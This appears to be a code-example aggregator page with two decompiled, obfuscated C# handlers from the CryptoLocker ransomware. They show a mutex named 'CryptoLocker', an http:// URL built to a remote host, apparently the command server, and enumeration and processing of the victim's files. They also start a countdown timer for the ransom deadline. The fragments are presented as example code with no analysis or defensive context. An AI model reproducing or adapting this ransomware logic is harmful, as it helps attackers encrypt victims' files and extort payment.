Esempio n. 1
0
 private void method_3(object sender, EventArgs e)
 {
     this.string_0 = Delegate88.smethod_0("http://", this.gclass0_0.method_4(), "/");
     this.gclass0_0.method_15(this.string_0);
     this.gclass0_0.dateTime_0 = Delegate89.smethod_0().AddSeconds((double)this.gclass0_0.int_0);
     Delegate90.smethod_0(this.timer_0, 1000);
     Delegate60.smethod_0(this.timer_0, new EventHandler(this.method_4));
     Delegate91.smethod_0(this.timer_0);
     Delegate54.smethod_0(this.label_1, this.gclass0_0.dateTime_0.ToString());
     Delegate102.smethod_0(this.progressBar_0, 30);
     this.method_0();
     this.thread_0 = Delegate16.smethod_0(new ThreadStart(this.method_7));
     Delegate103.smethod_0(this.thread_0);
 }
Esempio n. 2
0
        private void method_1(object sender, EventArgs e)
        {
            ThreadStart   threadStart = null;
            List <string> list_       = new List <string>();

            try
            {
                this.gclass0_0.method_1();
                this.string_0 = Delegate88.smethod_0("http://", this.gclass0_0.method_4(), "/");
            }
            catch (Exception)
            {
            }
            Delegate41.smethod_5(this);
            if (this.gclass0_0.method_12(this.string_0))
            {
                if (threadStart == null)
                {
                    threadStart = new ThreadStart(this.method_9);
                }
                Thread object_ = Delegate16.smethod_0(threadStart);
                Delegate103.smethod_0(object_);
            }
            this.mutex_1 = Delegate17.smethod_0();
            this.mutex_0 = Delegate19.smethod_0(false, "CryptoLocker");
            if (this.gclass0_0.method_12(this.string_0))
            {
                try
                {
                    Delegate106.smethod_0(this.mutex_1);
                    if (this.gclass0_0.method_2(this.string_0, 1) || this.gclass0_0.method_2(this.string_0, 0))
                    {
                        foreach (string current in this.gclass0_0.method_5())
                        {
                            this.gclass0_0.method_19(list_, current);
                        }
                    }
                    this.gclass0_0.method_15(this.string_0);
                    Delegate107.smethod_0(this.mutex_1);
                }
                catch (Exception)
                {
                }
                try
                {
                    Delegate106.smethod_0(this.mutex_0);
                    Delegate106.smethod_0(this.mutex_1);
                }
                catch (AbandonedMutexException)
                {
                }
                Delegate41.smethod_8(this);
                try
                {
                    this.gclass0_0.method_11(this.string_0);
                    this.gclass0_0.method_10();
                }
                catch (Exception)
                {
                }
                this.gclass0_0.dateTime_0 = Delegate89.smethod_0().AddSeconds((double)this.gclass0_0.int_0);
                Delegate90.smethod_0(this.timer_0, 1000);
                Delegate60.smethod_0(this.timer_0, new EventHandler(this.method_2));
                Delegate91.smethod_0(this.timer_0);
                Delegate54.smethod_0(this.label_1, this.gclass0_0.dateTime_0.ToString());
            }
        }